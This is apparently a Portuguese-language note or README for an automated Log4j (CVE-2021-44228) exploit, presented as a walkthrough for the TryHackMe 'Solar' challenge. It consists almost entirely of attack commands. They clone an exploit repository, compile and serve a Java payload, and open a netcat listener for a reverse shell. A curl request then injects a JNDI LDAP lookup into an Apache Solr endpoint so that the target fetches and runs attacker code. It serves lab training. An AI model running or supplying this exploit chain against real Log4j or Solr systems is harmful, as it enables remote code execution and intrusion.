
Exploração automatizada do Log4j CVE-2021-44228 com servidor LDAP e compilação de payload, incluindo um passo a passo para o desafio Solar do TryHackMe.
💻 -h3x0v3rl0rd-
git clone https://github.com/n3rdh4x0r/log4j.git
ifconfig tun0
python3 log4j.py 10.8.227.251


javac Exploit.java -source 8 -target 8

python3 -m http.server 8888

nc -lnvp 9999

curl 'http://10.10.45.175:8983/solr/admin/cores?foo=$\{jndi:ldap://10.8.227.251:1389/Exploit\}'

